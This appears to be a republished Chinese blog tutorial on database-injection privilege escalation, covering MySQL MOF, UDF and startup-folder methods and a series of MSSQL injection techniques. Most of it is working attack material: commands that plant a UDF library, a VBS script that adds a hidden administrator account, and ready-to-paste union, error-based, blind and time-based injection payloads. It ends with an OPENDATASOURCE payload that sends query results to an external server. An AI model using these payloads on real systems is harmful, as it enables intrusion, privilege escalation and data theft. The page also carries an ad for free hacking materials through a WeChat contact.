主頁 >  其他 > 資料庫注入提權總結(二)

資料庫注入提權總結(二)

2022-08-11 11:47:58 其他

mysql提權

MOF提權

MOF 提權是一個有歷史的漏洞,基本上在 Windows Server 2003的環境下才可以成功,

提權的原理是C:/Windows/system32/wbem/mof/目錄下的 mof檔案每 隔一段時間(幾秒鐘左右)都會被系統執行,因為這個 MOF 里面有一部分是 VBS 腳本,所以可以利用這個 VBS 腳本來呼叫 CMD 來執行系統命令,如果 MySQL 有權限操作 mof目錄的話,就可以來執行任意命令了,

經測驗win7雖然存在這個檔案目錄,但是mysql以管理員權限運行,也會提示寫入失敗,

UDF提權

UDF說白了就是自定義函式,是資料庫功能的一種擴展,用戶通過自定義函式可以實作在 MySQL 中無法方便實作的功能,其添加的新函式都可以在SQL陳述句中呼叫,就像呼叫本機函式 version() 等方便,

如果我們添加的自定義函式可以執行系統命令,那么是不是就相當于以mysql的權限去執行系統命令,如果mysql的權限比較高,是不是就可以達到一種權限提升的效果

元件

構建UDF的程序,其實就是呼叫元件的程序,因此我們首先必須知道元件存放的位置,以及要有合適的元件

  • 如果mysql版本大于5.1,udf.dll檔案必須放置在mysql安裝目錄的lib\plugin檔案夾下

  • 如果mysql版本小于5.1,udf.dll檔案在windows server 2003下放置于c:\windows\system32目錄,在windows server 2000下放置在c:\winnt\system32目錄

show variables like '%plugin%'; # 查找插件目錄
select @@basedir; # 查找 mysql 安裝目錄

那么元件檔案去哪里找呢?實際上我們常用的工具 sqlmap 和 Metasploit 里面都自帶了對應系統的元件檔案,

  • sqlmap 的 UDF 元件檔案位置 sqlmap根目錄/data/udf/mysql

image-20220729170857874.png

不過 sqlmap 中 自帶這些元件為了防止被誤殺都經過編碼處理過,不能被直接使用,不過可以利用 sqlmap 自帶的解碼工具cloak.py 來解碼使用,cloak.py 的位置為:/extra/cloak/cloak.py ,解碼方法如下:

# 解碼 32 位的 Linux 元件
? python3 cloak.py -d -i ../../data/udf/mysql/linux/32/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_32.so
?
# 解碼 64 位的 Linux 元件
? python3 cloak.py -d -i ../../data/udf/mysql/linux/64/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so
?
# 解碼 32 位的 Windows 元件
? python3 cloak.py -d -i ../../data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll
?
# 解碼 64 位的 Windows 元件
? python3 cloak.py -d -i ../../data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll
  • Metasploit的UDF元件檔案位置/usr/share/metasploit-framework/data/exploits/mysql

image-20220729171316655.png

  • 兩款工具帶的元件是一樣的

尋找插件目錄

image-20220729171719574.png

如果不存在的話

select @@basedir; # 尋找MySQL的安裝目錄

image-20220729171944681.png

然后通過webshell手動去創建

【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備注 “博客園” 獲取!】

 ① 網安學習成長路徑思維導圖
 ② 60+網安經典常用工具包
 ③ 100+SRC漏洞分析報告
 ④ 150+網安攻防實戰技術電子書
 ⑤ 最權威CISSP 認證考試指南+題庫
 ⑥ 超1800頁CTF實戰技巧手冊
 ⑦ 最新網安大廠面試題合集(含答案)
 ⑧ APP客戶端安全檢測指南(安卓+IOS)

寫入元件

方法一:

當SQL 注入且是高權限,plugin 目錄可寫且需要 secure_file_priv 無限制,MySQL 插件目錄可以被 MySQL 用戶寫入,這個時候就可以直接使用 sqlmap 來上傳元件,又因為 GET 有位元組長度限制,所以往往 POST 注入才可以執行這種攻擊

sqlmap -u "http://localhost:30008/" --data="https://www.cnblogs.com/hetianlab/p/id=1" --file-write="/Users/sec/Desktop/lib_mysqludf_sys_64.so" --file-dest="/usr/lib/mysql/plugin/udf.so"

方法二:

當沒有注入點時,我們可以操作原生 SQL 陳述句,這種情況下當 secure_file_priv 無限制的時候,我們也是可以手工寫檔案到 plugin 目錄下的:

# 直接 SELECT 查詢十六進制寫入
SELECT 0x7f454c4602... INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';
?
# 解碼十六進制再寫入多此一舉
SELECT unhex('7f454c4602...') INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';

這里的十六進制怎么獲取呢?可以利用 MySQL 自帶的 hex 函式來編碼:

# 直接傳入路徑編碼
SELECT hex(load_file('/lib_mysqludf_sys_64.so'));
?
# 也可以將路徑 hex 編碼
SELECT hex(load_file(0x2f6c69625f6d7973716c7564665f7379735f36342e736f));

一般為了更方便觀察,可以將編碼后的結果匯入到新的檔案中方便觀察:

SELECT hex(load_file('/lib_mysqludf_sys_64.so')) into dumpfile '/tmp/udf.txt'; 
?
SELECT hex(load_file(0x2f6c69625f6d7973716c7564665f7379735f36342e736f)) into dumpfile '/tmp/udf.txt';

方法三:

當webshell有一定權限時,可以直接通過檔案上傳的方式,上傳對應的dll檔案

創建自定義函式并呼叫命令

  • CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

image-20220729173706770.png

  • select * from mysql.func; 驗證是否添加成功

image-20220729173831057.png

  • 呼叫該函式,即可以mysql權限執行一些系統命令

image-20220729173940681.png

  • 洗掉自定義函式 drop function sys_eval;

image-20220729174144085.png

UDF Shell

方法一:UDF.PHP

http://pan.dns.outnet/index.php?mod=shares&sid=R1ZXZ0UwdTJuSjVxZEVxd1JCc0E0TWl1VzZ1NjVOWW91Z3U2RExF

image-20220729174637834.png

方法二:ntunnel_mysql.php

Navicat內置的php-mysq鏈接檔案,上傳到目標網站

image-20220729174744518.png

對navicat進行如下配置即可:

image-20220729175208161.png

方法三:蟻劍內置插件

image-20220729175320157.png

啟動項提權

windows開機時候都會有一些開機啟動的程式,那時候啟動的程式權限都是system,因為是system把他們啟動的,利用這點,我們可以將自動化腳本寫入啟動項,達到提權的目的,當 Windows 的啟動項可以被 MySQL 寫入的時候可以使用 MySQL 將自定義腳本匯入到啟動項中,這個腳本會在用戶登錄、開機、關機的時候自動運行,

在windows2003的系統下,啟動項路徑如下:
C:\Documents and Settings\Administrator\「開始」選單\程式\啟動
C:\Documents and Settings\All Users\「開始」選單\程式\啟動
?
在windows2008的系統下,啟動項路徑如下:
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

我們在拿到一個網站的webshell的時候如果想進一步的獲得網站的服務器權限,查看服務器上系統盤的可讀可寫目錄,若是啟動目錄 C:\Users\用戶名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 是可讀可寫的,我們就可以執行上傳一個vbs或者bat的腳本進行提權,

這里使用test.vbs添加用戶密碼,上傳到啟動目錄重啟的時候即可自動添加賬號密碼

set wshshell=createobject("wscript.shell")
a=wshshell.run("cmd.exe /c net user test test123 /add",0)
b=wshshell.run("cmd.exe /c net localgroup administrators test /add",0)

通過mysql的話:

use mysql;
create table test(cmd text);
insert into a values(“set wshshell=createobject(“”wscript.shell””)”);
insert into a values(“a=wshshell.run(“”cmd.exe /c net user test test123 /add“”,0)”);
insert into a values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators test /add“”,0)”);
select * from a into outfile “C:\Documents and Settings\All Users\「開始」選單\程式\啟動\secist.vbs”;

重啟之后可以提權

CVE-2016-6663和CVE-2016-6664

https://www.freebuf.com/articles/web/288941.html

https://lengjibo.github.io/mysqludf/

MSSQL

MSSQL基礎

系統自帶庫

MSSQL安裝后默認帶了六個資料庫

  • 4個系統庫:mastermodeltempdbmsdb

  • 2個示例庫:NorthwindTraderspubs

image.png

系統視圖表

MSSQL資料庫有安裝的自帶資料表:

image.png

 

MSSQL權限控制

  • 服務器角色

 

image.png

可以通過如下陳述句判斷:

select is_srvrolemember('sysadmin')

image-20220801134847650

  • 資料庫角色

 

image.png

可以通過如下陳述句判斷:

select is_member('db_owner')

image-20220801154235249

MSSQL常用陳述句

# 創建資料庫
create database [dbname];
create database test;
?
# 洗掉資料庫
drop database [dbname];
drop database test;
?
# 創建新表
create table table_name (name char(10),age tinyint,sex int);
# 創建新表前要選擇資料庫,默認是master庫
use test;
create table admin (users char(255),passwd char(255),sex int);
?
# 洗掉新表
drop table table_name;
drop table dbo.admin;
?
# 向表中插入資料
insert into table_name (column1,column2) values(value1,value2);
insert into admin (users,passwd,sex) values('admin','admin',1);
?
# 洗掉內容
delete from table_name where column1=value1;
delete from admin where sex=2;
?
# 更新內容
update table_name set column2=”xxx” where column1=value1;
update admin set users='admintest' where sex=2;
?
# 查找內容
select * from table_name where column1=value1;
select passwd from admin where users='admin';
?
  • 排序&獲取下一條資料

    • MSSQL資料庫中沒有limit排序獲取欄位,但是可以使用top 1來顯示資料中的第一條資料,

    • 使用 <> 來排除已經顯示的資料,獲取下一條資料,也就是不等于的意思,

    • 使用not in來排除已經顯示的資料,獲取下一條資料 ,后面可以跟一個集合,

# 使用<>獲取資料
id=-2 union select top 1 1,id,name from dbo.syscolumns where id='5575058' and name<>'id' and name<>'username'--+
# 使用not in獲取資料
id=-2 union select top 1 1,table_name from information_schema.tables where table_name not in(select top 1 table_name from information_schema.tables)--+
id=-2 union select top 1 1,id,name from dbo.syscolumns where id='5575058' and name not in('id','username')--+

MSSSQL注釋

單行:--空格
多行:/**/

常用函式

image.png

 

常見注入型別

聯合查詢注入

1.判斷注入點及型別
?id=1' and 1=1--+
?id=1' and 1=2--+
# 那么此處是字符型注入,需要單引號閉合
?
2.判斷欄位數
?id=1' order by 3--+
?id=1' order by 4--+
?
3.聯合查詢判斷回顯點
?id=0' union select 1,2,3--+
?
4.獲取當前資料庫名字和版本資訊
?id=0' union select 1,db_name(),@@version--+
?
5.獲取所有的資料庫名,database在較高版本的SQL Server 中已經變成了動態視圖
?id=0' union select 1,db_name(),name from master.sys.databases where name not in(select top 1 name
from master.sys.databases)--+
?
6.獲取所有的表名,當information前面沒有庫名時,默認查詢當前資料庫,與mysql不同,每個資料庫都有單獨的information表,可以用master.information_schema.tables 來查詢不同資料庫的資訊
?id=0' union select top 1 1,2,table_name from information_schema.tables where table_name not in
(select top 1 table_name from information_schema.tables)--+
?
7.獲取所有的欄位名,多加些限定條件方便注入
?id=0' union select top 1 1,2,column_name from information_schema.columns where column_name not in
(select top 1 column_name from information_schema.columns)--+
?
?id=0' union select top 1 1,2,column_name from information_schema.columns where table_name='users' and
column_name not in(select top 2 column_name from information_schema.columns where table_name='users')--
?
8.獲取users表賬號密碼資訊
?id=0' union select top 1 1,username,password from users--+

報錯注入

  • MSSQL資料庫是強型別語言資料庫,當型別不一致時將會報錯,配合子查詢即可實作報錯注入

1.判斷注入點
id=1
?
2.判斷是否為MSSQL資料庫
# 回傳正常為MSSQL
id=1 and exists(select * from sysobjects)
id=1 and exists(select count(*) from sysobjects)
?
3.判斷資料庫版本號
id=1 and @@version>0--+
# @@version是mssql的全域變數,@@version>0執行時轉換成數字會報錯,也就將資料庫資訊暴露出來了,必須是在where后面拼接執行
?
4.獲取當前資料庫名
and db_name()>0--+
and 1=db_name()--+
# 報錯注入的原理就是將其他型別的值轉換層int型失敗后就會爆出原來陳述句執行的結果
?
5.判斷當前服務器擁有的權限
and 1=(select IS_SRVROLEMEMBER('sysadmin'))--+
and 1=(select IS_SRVROLEMEMBER('serveradmin'))--+
and 1=(select IS_SRVROLEMEMBER('setupadmin'))--+
and 1=(select IS_SRVROLEMEMBER('securityadmin'))--+
and 1=(select IS_SRVROLEMEMBER('diskadmin'))--+
and 1=(select IS_SRVROLEMEMBER('bulkadmin'))--+
?
6.判斷當前角色是否為DB_OWNER
and 1=(select is_member('db_owner'))--+
# db_owner權限可以通過備份方式向目標網站寫檔案
?
7.獲取當前用戶名
and user_name()>0--+
?
8,獲取所有資料庫名
and (select name from master.sys.databases where database_id=1)>0--+
# 更改database_id的值來獲取所有的資料庫
?
9.獲取資料庫的個數
and 1=(select quotename(count(name)) from master.sys.databases)--+
?
10.一次性獲取所有資料庫庫
and 1=(select quotename(name) from master.sys.databases for xml path(''))--+
?
11.獲取所有的表名
# 獲取當前庫第一個表
and 1=(select top 1 table_name from information_schema.tables)--+
# 獲取當前庫第二個表
and 1=(select top 1 table_name from information_schema.tables where table_name not in('emails'))--+
# 獲取當前庫第三個表
and 1=(select top 1 table_name from information_schema.tables where table_name not in('emails','uagents'))--+
# 也可通過更改top 引數獲取表
and 1=(select top 1 table_name from information_schema.tables where table_name not in
(select top 5 table_name from information_schema.tables))--+
# quotename和for xml path('')一次性獲取全部表
and 1=(select quotename(table_name) from information_schema.tables for xml path(''))--+
# quotename()的主要作用就是在存盤程序中,給列名、表名等加個[]、’’等以保證sql陳述句能正常執行,
?
12.獲取欄位名
# 通過top 和 not in 獲取欄位
and 1=(select top 1 column_name from information_schema.columns where table_name='users')--+
and 1=(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('id','username'))--+
# 通過quotename 和 for xml path('') 獲取欄位
and 1=(select quotename(column_name) from information_schema.columns where table_name='emails' for xml path(''))--+
?
13.獲取表中資料
and 1=(select quotename(username) from users for xml path(''))--+
and 1=(select quotename(password) from users for xml path(''))--+

布爾盲注

1. 判斷注入點  
and 1=1 and 1=2 and '1'='1' and '1456'='1456'--+
?
2.猜解資料庫個數
id=1 and (select count(*) from sys.databases)=7--+        # 存在7個資料庫
?
3.猜解資料庫名長度
id=1 and len((select top 1 name from sys.databases))=6--+ # 第一個庫名長度為6
id=1 and len(db_name())=4--+                              # 當前資料庫名長度為4
?
4.猜解資料庫名
id=1 and ascii(substring(db_name(),1,1))=115--+ # 截取庫名第一個字符的ascii碼為115——s
id=1 and ascii(substring(db_name(),2,1))=113--+ # 截取庫名第二個字符的ascii碼為113——q
# 截取第一個庫名第一個字符的ascii碼為109——m
id=1 and ascii(substring((select top 1 name from sys.databases),1,1))=109--+
# 截取第二個庫名第一個字符的ascii碼為105——i
id=1 and ascii(substring((select top 1 name from sys.databases where name not in ('master')),1,1))=105--+
?
5.猜解表名
# 截取當前庫的第一個表的第一個字符的ascii碼為101——e
id=1 and ascii(substring((select top 1 table_name from information_schema.tables),1,1))=101--+
# 截取當前庫的第二個表的第一個字符的ascii碼為117——u
id=1 and ascii(substring((select top 1 table_name from information_schema.tables where table_name not in ('emails')),1,1))=117--+
?
6.猜解欄位名
# 截取當前庫的emails表的第一個字符的ascii碼為105——i
id=1 and ascii(substring((select top 1 column_name from information_schema.columns where table_name='emails'),1,1))=105--+
#截取當前庫的emails表的第二個字符的ascii碼為100——d
id=1 and ascii(substring((select top 1 column_name from information_schema.columns where table_name='emails'),2,1))=100--+
?
7.猜解表中資料
# username欄位的資料第一個字符為D
id=1 and ascii(substring((select top 1 username from users),1,1))=68--+

時間盲注

1.判斷是否存在注入
id=1 WAITFOR DELAY '0:0:5'--+
?
2.判斷權限
# 如果是sysadmin權限,則延時5秒
id=1 if(select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--+
?
3.查詢當前資料庫的長度和名字
# 二分法查詢長度
id=1 if(len(db_name()))>40 WAITFOR DELAY '0:0:5'--+
# 查詢資料庫名字
# substring截取字串的位置,用ascii轉為數字進行二分法查詢
id=1 if(ascii(substring(db_name(),1,1)))>50 WAITFOR DELAY '0:0:5'--+
?
4.查詢資料庫的版本
id=1 if(ascii(substring((select @@version),1,1))=77 WAITFOR DELAY '0:0:5'--+ # ascii 77 = M
?
5.查詢表個數,Sysobject 存盤了所有表的資訊,所有資料庫的都放在一起
id=1 if((select count(*) from SysObjects where xtype='u')>5) WAITFOR DELAY '0:0:5'--+
# 當前資料庫表的個數為6
?
6.查詢第一個表的長度
# 查詢第一個表
id=1 and select top 1 name from SysObjects where xtype='u'
# 查詢結果為1
(select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u')
# 利用and,進行判斷,9為表長度的猜測
and len(name)=9
# 第一個表名長度為6
id=1 if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u') and len(name)=9)=1) WAITFOR DELAY '0:0:5'--+
id=1 if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u') and len(name)=6)=1) WAITFOR DELAY '0:0:10'--+
?
7.查詢第一個表的表名
id=1 if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u') and ascii(substring(name,1,1))>90)=1) WAITFOR DELAY '0:0:5'--+
id=1 if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u') and ascii(substring(name,1,1))=101)=1) WAITFOR DELAY '0:0:5'--+
?
8.查詢第二個表的長度
# 查詢第一個表名,去除emails, emails為第一個表名
select top 1 name from SysObjects where xtype='u' and name not in ('emails')
# 同理,第三個表則 and name not in ('emails','uagents')
id=1 if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u' and name not in ('emials')) and len(name)=6)<>0) WAITFOR DELAY '0:0:5'--+
?
9.查詢第二個表的名字
id=1 if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u' and name not in ('emails')) and ascii(substring(name,1,1)>100)!=1) WAITFOR DELAY '0:0:5'--+
id=1 if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u' and name not in ('emails')) and ascii(substring(name,1,1)>100)!=0) WAITFOR DELAY '0:0:5'--+
?
10.查詢第一個表中的欄位
# and name not in ('')查詢第二個欄位的時候可以直接在其中,排除第一個欄位名
id=1 if((select count(*) from syscolumns where name in (select top 1 name from syscolumns where id = object_id('emails') and name not in ('')) and ascii(substring(name,1,1))=1)!=0) WAITFOR DELAY '0:0:1'--+
?
11.查詢欄位型別
id=1 if((select count(*) from information_schema.columns where data_type in(select top 1 data_type from information_schema.columns where table_name ='emails') and ascii(substring(data_type,1,1))=116)!=0) WAITFOR DELAY '0:0:5'--+
?
12.查詢資料
# 查詢所有資料庫
SELECT Name FROM Master..SysDatabases ORDER BY Name
# 查詢存在password欄位的表名
SELECT top 1 sb.name FROM syscolumns s JOIN sysobjects sb ON s.id=sb.id WHERE s.name='password'
id=1 if((select count(*) from sysobjects where name in ((select name from sysobjects where name in (SELECT top 1 sb.name FROM syscolumns s JOIN sysobjects sb ON s.id=sb.id WHERE s.name='password') and ascii(substring(sysobjects.name,1,1))>1)))>0) waitfor delay '0:0:1'--
# 查詢包含pass的欄位名
SELECT top 1 name FROM SysColumns where name like '%pass%'
id=1 if((select count(*) from SysColumns where name in (SELECT top 1 name FROM SysColumns where name like '%pass%' and ascii(substring(name,1,1))>1))>0) waitfor delay '0:0:1'--

反彈注入

  • 反彈注入條件相對苛刻一些,一是需要一臺搭建了mssql資料庫的vps服務器,二是需要開啟堆疊注入,

  • 反彈注入需要使用opendatasource函式,

    • OPENDATASOURCE(provider_name,init_string)

    • 使用opendatasource函式將當前資料庫查詢的結果發送到另一資料庫服務器中,

  • 基本流程

    • 連接vps的mssql資料庫,新建表test,欄位數與型別要與要查詢的資料相同,

    CREATE TABLE test(name VARCHAR(255))
    • 獲取資料庫所有表,使用反彈注入將資料注入到表中,注意這里填寫的是資料庫對應的引數,最后通過空格隔開要查詢的資料,

    # 查詢sysobjects表
    ?id=1;insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.test select name from dbo.sysobjects where xtype='U' --+
    ?
    # 查詢information_schema資料庫
    ?id=1;insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.test select table_name from information_schema.tables--+
    ?
    # 查詢information_schema資料庫
    id=1;insert intoopendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.test select column_name from information_schema.columns where table_name='admin'--+
    ?
    # 查詢syscolumns表
    id=1;insert intoopendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.test select name from dbo.syscolumns where id=1977058079--+

 更多靶場實驗練習、網安學習資料,請點擊這里>>

 

搜索

復制

合天智匯:合天網路靶場、網安實戰虛擬環境

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/501498.html

標籤:其他

上一篇:Spring Security靜態資源過濾(11)

下一篇:檔案包含漏洞復習總結

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more